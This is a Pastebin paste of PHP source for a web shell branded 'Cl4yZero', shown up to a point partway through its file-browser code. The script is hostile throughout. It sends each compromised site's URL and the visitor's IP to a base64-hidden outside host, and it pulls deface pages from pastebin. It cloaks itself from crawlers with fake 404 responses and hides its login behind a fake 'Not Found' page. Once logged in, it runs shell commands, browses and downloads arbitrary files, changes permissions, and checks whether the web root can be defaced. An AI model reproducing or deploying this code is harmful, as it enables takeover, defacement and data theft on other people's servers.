autodatabasescom

byhero44@gmail.com

Jan 23rd, 2019
822
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 125.28 KB | None | 0 0
  1. function GetIP(){ if(getenv("HTTP_CLIENT_IP")) { $ip = getenv("HTTP_CLIENT_IP");
  2.  } elseif(getenv("HTTP_X_FORWARDED_FOR")) { $ip = getenv("HTTP_X_FORWARDED_FOR");
  3.  if (strstr($ip, ',')) { $tmp = explode (',', $ip);
  4.  $ip = trim($tmp[0]);
  5.  } } else { $ip = getenv("REMOTE_ADDR");
  6.  } return $ip;
  7.  } $x = base64_decode('aHR0cDovL2J5cjAwdC5jby9sLQ==').GetIP().'-'.base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
  8.  if(function_exists('curl_init')) { $ch = @curl_init();
  9.  curl_setopt($ch, CURLOPT_URL, $x);
  10.  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  11.  $gitt = curl_exec($ch);
  12.  curl_close($ch);
  13.  if($gitt == false){ @$gitt = file_get_contents($x);
  14.  } }elseif(function_exists('file_get_contents')){ @$gitt = file_get_contents($x);
  15.  }error_reporting(0);
  16. ob_start();
  17. set_time_limit(0);
  18. @define('VERSION', '2.1');
  19. $color = "#00ff00";
  20. $background_login = "http://shineindiafoundation.co.in/admin/event-img/658395.png";
  21. $background = "https://s-media-cache-ak0.pinimg.com/originals/68/a3/70/68a3704aa96f32671f5d692a3d8986aa.jpg";
  22. $defaceku1  =file_get_contents("https://pastebin.com/raw/q6imSeTB"); //Link SC depes.
  23. $defaceku2  =file_get_contents("https://pastebin.com/raw/q6imSeTB");
  24. $defaceku3  = file_get_contents("https://pastebin.com/raw/q6imSeTB");
  25. $fontcolor_global = 'white';
  26. $auth_pass = "8a6fb5b6c843ed48cf0c1b048120a48f"; // Ganti Password? Disini!
  27. // wearecl4y2018
  28.  
  29. if(isset($_SERVER['HTTP_USER_AGENT']) && (preg_match('/bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww/i', $_SERVER['HTTP_USER_AGENT']))){
  30.     header("HTTP/1.0 404 Not Found");
  31.     header("Status: 404 Not Found");
  32.     die();
  33. }
  34. elseif(!isset($_SERVER['HTTP_USER_AGENT'])){
  35.     header("HTTP/1.0 404 Not Found");
  36.     header("Status: 404 Not Found");
  37.     die();
  38. }
  39. @define('SELF_PATH', __FILE__);
  40. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  41.     header('HTTP/1.0 404 Not Found');
  42.     exit;
  43. }
  44. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  45.     $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
  46.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  47.         header('HTTP/1.0 404 Not Found');
  48.         exit;
  49.     }
  50. }
  51. session_start();
  52. function printLogin() {
  53. <style>input[type=password]{color:teal;background:black;border:1px solid teal}a{text-decoration:none;color:white;padding-left:270px}sad{font-family:'Fredericka the Great',cursive;color:teal;font-size:50px}</style>
  54. <title>:>Cl4yZero<:</title>
  55. <link rel="icon" type="image/png" href="http://downloadicons.net/sites/default/files/heartbreak-icon-85786.png">
  56. <body style="background-color:black;color:white">
  57. <link href="http://fonts.googleapis.com/css?family=Fredericka+the+Great" rel="stylesheet" type="text/css">
  58. <center>
  59. global $background_login;
  60. _________________________________________________________________________________<br>
  61. Idiot BlackHat<br>
  62. <sad>Cl4yZero</sad><br>
  63. <iframe width="0" height="0" src="https://www.youtube.com/embed/a3sbfHu-6Fk?autoplay=1" frameborder="0" allowfullscreen></iframe>
  64. <img src="echo $background_login;" style="margin-left:65px">
  65. <form method=post>
  66. <br>
  67. <input type=password name=pass placeholder=./Password>
  68. </form>
  69. </center>
  70. </div>
  71. </center>
  72. exit; }
  73.  
  74. function printLogin404(){
  75.     header("HTTP/1.0 404 Not Found");
  76.     header("Status: 404 Not Found");
  77.     echo '
  78.    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  79.    <html><head>
  80.    <title>404 Not Found</title>
  81.    </head><body>
  82.    <h1>Not Found</h1>
  83.    <p>The requested URL '.$_SERVER['PHP_SELF'].' was not found on this server.</p>
  84.    <hr>
  85.    <address>Apache '.phpversion().' Server at '.$_SERVER['SERVER_NAME'].' Port 80</address>
  86.        <style>input { margin:0;background-color:#fff;border:0px solid #fff; color:#fff; text-align:center;}</style>
  87.        <form action="" method="post">
  88.        <center><input type=password name="pass"></center>
  89.        </body></html>
  90.    </form>';
  91.    
  92. }
  93. if( !isset( $_SESSION['login']))
  94.     if( empty( $auth_pass ) || ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) ){
  95.         $_SESSION['login'] = true;
  96.         header('Location: ?');
  97.        
  98.     }
  99.     else{
  100.         printLogin();
  101.     }
  102.  
  103.  
  104.  
  105. if( get_magic_quotes_gpc() ) {
  106.     function stripslashes_array($array) {
  107.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  108.     }
  109.     $_POST = stripslashes_array($_POST);
  110. }
  111.  
  112.  
  113.  
  114. if (isset($_GET["dl"]) && ($_GET["dl"] != "")) {
  115.     $file  = $_GET["dl"];
  116.     $filez = @file_get_contents($file);
  117.     header("Content-type: application/octet-stream");
  118.     header("Content-length: " . strlen($filez));
  119.     header("Content-disposition: attachment;filename='" . basename($file) . "';");
  120.     echo $filez;
  121.     exit;
  122. } elseif (isset($_GET["dlgzip"]) && ($_GET["dlgzip"] != "")) {
  123.     $file  = $_GET['dlgzip'];
  124.     $filez = gzencode(@file_get_contents($file));
  125.     header("Content-Type:application/x-gzip\n");
  126.     header("Content-length: " . strlen($filez));
  127.     header("Content-disposition: attachment;filename='" . basename($file) . ".gz';");
  128.     echo $filez;
  129.     exit;
  130. }
  131. if (isset($_GET["img"])) {
  132.     @ob_clean();
  133.     $d   = magicboom($_GET["y"]);
  134.     $f   = $_GET["img"];
  135.     $inf = @getimagesize($d . $f);
  136.     $ext = explode($f, );
  137.     $ext = $ext[count($ext) - 1];
  138.     @header("Content-type: " . $inf["mime"]);
  139.     @header("Cache-control: public");
  140.     @header("Expires: " . date("r", mktime(0, 0, 0, 1, 1, 2030)));
  141.     @header("Cache-control: max-age=" . (60 * 60 * 24 * 7));
  142.     @readfile($d . $f);
  143.     exit;
  144. }
  145. $software = getenv("SERVER_SOFTWARE");
  146. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  147.     $safemode = TRUE;
  148. else
  149.     $safemode = FALSE;
  150. $system = @php_uname();
  151. if (strtolower(substr($system, 0, 3)) == "win")
  152.     $win = TRUE;
  153. else
  154.     $win = FALSE;
  155. if (isset($_GET['sad'])) {
  156.     if (@is_dir($_GET['view'])) {
  157.         $pwd = $_GET['view'];
  158.         @chdir($pwd);
  159.     } else {
  160.         $pwd = $_GET['sad'];
  161.         @chdir($pwd);
  162.     }
  163. }
  164. if (!$win) {
  165.     if (!$user = rapih(exe("whoami")))
  166.         $user = "";
  167.     if (!$id = rapih(exe("id")))
  168.         $id = "";
  169.     $prompt = $user . " \$ ";
  170.     $pwd    = @getcwd() . DIRECTORY_SEPARATOR;
  171. } else {
  172.     $user   = @get_current_user();
  173.     $id     = $user;
  174.     $prompt = $user . " &gt;";
  175.     $pwd    = realpath() . "\\";
  176.     $v      = explode("\\", $d);
  177.     $v      = $v[0];
  178.     foreach (range("A", "Z") as $letter) {
  179.         $bool = @is_dir($letter . ":\\");
  180.         if ($bool) {
  181.             $letters .= "<a href='?sad=" . $letter . ":\\'>[ ";
  182.             if ($letter . ":" != $v) {
  183.                 $letters .= $letter;
  184.             } else {
  185.                 $letters .= "<span class='gaya'>" . $letter . "</span>";
  186.             }
  187.             $letters .= " ]</a> ";
  188.         }
  189.     }
  190. }
  191.  
  192. if (function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))
  193.     $posix = TRUE;
  194. else
  195.     $posix = FALSE;
  196. $server_ip     = @gethostbyname($_SERVER["HTTP_HOST"]);
  197. $my_ip         = $_SERVER['REMOTE_ADDR'];
  198. $bindport      = "13123";
  199. $bindport_pass = "Krypton";
  200. $pwds          = explode(DIRECTORY_SEPARATOR, $pwd);
  201. $pwdurl        = "";
  202. for ($i = 0; $i < sizeof($pwds) - 1; $i++) {
  203.     $pathz = "";
  204.     for ($j = 0; $j <= $i; $j++) {
  205.         $pathz .= $pwds[$j] . DIRECTORY_SEPARATOR;
  206.     }
  207.     $pwdurl .= "<a href='?sad=" . $pathz . "'>" . $pwds[$i] . " " . DIRECTORY_SEPARATOR . " </a>";
  208. }
  209. if (isset($_POST['rename'])) {
  210.     $old = $_POST['oldname'];
  211.     $new = $_POST['newname'];
  212.     @rename($pwd . $old, $pwd . $new);
  213.     $file = $pwd . $new;
  214. }
  215. if (isset($_POST['chmod'])) {
  216.     $name  = $_POST['name'];
  217.     $value = $_POST['newvalue'];
  218.     if (strlen($value) == 3) {
  219.         $value = 0 . "" . $value;
  220.     }
  221.     @chmod($pwd . $name, octdec($value));
  222.     $file = $pwd . $name;
  223. }
  224. if (isset($_POST['chmod_folder'])) {
  225.     $name  = $_POST['name'];
  226.     $value = $_POST['newvalue'];
  227.     if (strlen($value) == 3) {
  228.         $value = 0 . "" . $value;
  229.     }
  230.     @chmod($pwd . $name, octdec($value));
  231.     $file = $pwd . $name;
  232. }
  233. $buff = "&nbsp;" . $software . "<br>";
  234. $buff .= "&nbsp;" . $system . "<br>";
  235. if ($id != "")
  236.     $buff .= "&nbsp;" . $id . "<br>";
  237. if ($safemode)
  238.     $buff .= "&nbsp;safemode :&nbsp;<b><font style='color:#DD4736'>ON</font></b><br>";
  239. else
  240.     $buff .= "&nbsp;safemode :&nbsp;<b><font style='color:#00FF00'>OFF</font></b><br>";
  241. function showstat($stat)
  242. {
  243.     if ($stat == "on") {
  244.         return "<b><font style='color:lime'>ON</font></b>";
  245.     } else {
  246.         return "<b><font style='color:red'>OFF</font></b>";
  247.     }
  248. }
  249. function hdd($s) {
  250.     if($s >= 1073741824)
  251.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
  252.     elseif($s >= 1048576)
  253.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
  254.     elseif($s >= 1024)
  255.     return sprintf('%1.2f',$s / 1024 ) .' KB';
  256.     else
  257.     return $s .' B';
  258. }
  259. function testmysql()
  260. {
  261.     if (function_exists('mysql_connect')) {
  262.         return showstat("on");
  263.     } else {
  264.         return showstat("off");
  265.     }
  266. }
  267. function testcurl()
  268. {
  269.     if (function_exists('curl_version')) {
  270.         return showstat("on");
  271.     } else {
  272.         return showstat("off");
  273.     }
  274. }
  275. function testwget()
  276. {
  277.     if (exe('wget --help')) {
  278.         return showstat("on");
  279.     } else {
  280.         return showstat("off");
  281.     }
  282. }
  283. function testperl()
  284. {
  285.     if (exe('perl -h')) {
  286.         return showstat("on");
  287.     } else {
  288.         return showstat("off");
  289.     }
  290. }
  291. function ngindex($piye)
  292. {
  293.     if ($piye == "ok") {
  294.         return "<font style='color:lime'>Writeable (Bisa Tebas Index)</font>";
  295.     } else {
  296.         return "<b><font style='color:red'>Not Writeable</font></b>";
  297.     }
  298. }
  299. function can_deface(){
  300.     $thisdir = $_SERVER['DOCUMENT_ROOT'];
  301.     if (is_writable($thisdir)) {
  302.         return '&nbsp;Writeable Root Directory:<font color="green" size="+1">'.$thisdir.' '.ngindex("ok").'<br>';
  303.     } else {
  304.         return ngindex("ok").'<br>';
  305.     }
  306. }
  307. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  308. if(!function_exists('posix_getegid')) {
  309.     $user = @get_current_user();
  310.     $uid = @getmyuid();
  311.     $gid = @getmygid();
  312.     $group = "?";
  313. } else {
  314.     $uid = @posix_getpwuid(posix_geteuid());
  315.     $gid = @posix_getgrgid(posix_getegid());
  316.     $user = $uid['name'];
  317.     $uid = $uid['uid'];
  318.     $group = $gid['name'];
  319.     $gid = $gid['gid'];
  320. }
  321. $buff .= "&nbsp;MySQL: " . testmysql() . "&nbsp;|&nbsp;Perl: " . testperl() . "&nbsp;|&nbsp;cURL: " . testcurl() . "&nbsp;|&nbsp;WGet: " . testwget() . "<br>";
  322. $buff .= "&nbsp;Disk Size:<font style='color:lime'>".hdd(disk_free_space("/"))."</font>/".hdd(disk_total_space("/"))."<br>";
  323. $buff .= can_deface();
  324. $buff .= "&nbsp;Disable Function :$show_ds<br>";
  325. $buff .= "&nbsp;Drives : " . $letters . "&nbsp;&gt;&nbsp;" . $pwdurl;
  326. function rapih($text)
  327. {
  328.     return trim(str_replace("<br>", "", $text));
  329. }
  330. function magicboom($text)
  331. {
  332.     if (!get_magic_quotes_gpc()) {
  333.         return $text;
  334.     }
  335.     return stripslashes($text);
  336. }
  337. function showdir($pwd, $prompt)
  338. {
  339.     $fname = array();
  340.     $dname = array();
  341.     if (function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))
  342.         $posix = TRUE;
  343.     else
  344.         $posix = FALSE;
  345.     $user = "????:????";
  346.     if ($dh = opendir($pwd)) {
  347.         while ($file = readdir($dh)) {
  348.             if (is_dir($file)) {
  349.                 $dname[] = $file;
  350.             } elseif (is_file($file)) {
  351.                 $fname[] = $file;
  352.             }
  353.         }
  354.         closedir($dh);
  355.     }
  356.     sort($fname);
  357.     sort($dname);
  358.     $path   = @explode(DIRECTORY_SEPARATOR, $pwd);
  359.     $tree   = @sizeof($path);
  360.     $parent = "";
  361.     $buff   = " <form action='?sad=" . $pwd . "&amp;x=shell' method='post' style='margin:8px 0 0 0;'><table class='cmdbox' style='width:50%;'><tr><td>$prompt</td><td><input onMouseOver='this.focus();' id='cmd' class='inputz' type='text' name='cmd' style='width:400px;' value='' /><input class='inputzbut' type='submit' value='Do !' name='submitcmd' style='width:80px;' /></td></tr></form><form action='?' method='get' style='margin:8px 0 0 0;'><input type='hidden' name='y' value='" . $pwd . "' /><tr><td>view file/folder</td><center><td><input onMouseOver='this.focus();' id='goto' class='inputz' type='text' name='view' style='width:400px;' value='" . $pwd . "' /><input class='inputzbut' type='submit' value='view !' name='submitcmd' style='width:80px;' /></td></center></tr></form></table><table class='explore'> <tr><th>File & Dirs</th><th style='width:80px;'>Size</th><th style='width:210px;'>Owner:Group</th><th style='width:80px;'>perms</th><th style='width:110px;'>Last Modified</th><th style='width:190px;'>actions</th></tr> ";
  362.     if ($tree > 2)
  363.         for ($i = 0; $i < $tree - 2; $i++)
  364.             $parent .= $path[$i] . DIRECTORY_SEPARATOR;
  365.     else
  366.         $parent = $pwd;
  367.     foreach ($dname as $folder) {
  368.         if ($folder == ) {
  369.             if (!$win && $posix) {
  370.                 $name  = @posix_getpwuid(@fileowner($folder));
  371.                 $group = @posix_getgrgid(@filegroup($folder));
  372.                 $owner = $name['name'] . "<span class='gaya'> : </span>" . $group['name'];
  373.             } else {
  374.                 $owner = $user;
  375.             }
  376.             $buff .= "<tr><td><a href=\"?sad=" . $pwd . "\">$folder</a></td><td>-</td>
  377. <td style=\"text-align:center;\">" . $owner . "</td>
  378. <td><center>" . get_perms($pwd) . "</center></td>
  379. <td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($pwd)) . "</td><td><span id=\"titik1\">
  380. <a href=\"?sad=$pwd&amp;edit=" . $pwd . "newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a>
  381. </span><form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  382. <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" />
  383. <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  384. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
  385. </form></td></tr> ";
  386.         } elseif ($folder == "..") {
  387.             if (!$win && $posix) {
  388.                 $name  = @posix_getpwuid(@fileowner($folder));
  389.                 $group = @posix_getgrgid(@filegroup($folder));
  390.                 $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
  391.             } else {
  392.                 $owner = $user;
  393.             }
  394.             $buff .= "<tr><td>
  395. <a href=\"?sad=" . $parent . "\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'>  $folder</a></td><td>-</td>
  396. <td style=\"text-align:center;\">" . $owner . "</td>
  397. <td><center>" . get_perms($parent) . "</center></td> <td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($parent)) . "</td>
  398. <td><span id=\"titik2\"><a href=\"?sad=$pwd&amp;edit=" . $parent . "newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
  399. <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  400. <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" />
  401. <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  402. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
  403. </form></td></tr>";
  404.         } else {
  405.             if (!$win && $posix) {
  406.                 $name  = @posix_getpwuid(@fileowner($folder));
  407.                 $group = @posix_getgrgid(@filegroup($folder));
  408.                 $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
  409.             } else {
  410.                 $owner = $user;
  411.             }
  412.             $buff .= "<tr><td><a id=\"" . clearspace($folder) . "_link\" href=\"?sad=" . $pwd . $folder . DIRECTORY_SEPARATOR . "\"><img src='data:image/png;base64,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' width=20px/>  <font style='color:red;text-shadow:none;'>[</font> $folder <font style='color:red;text-shadow:none;'>]</font></a>
  413. <form action=\"?sad=$pwd\" method=\"post\" id=\"" . clearspace($folder) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
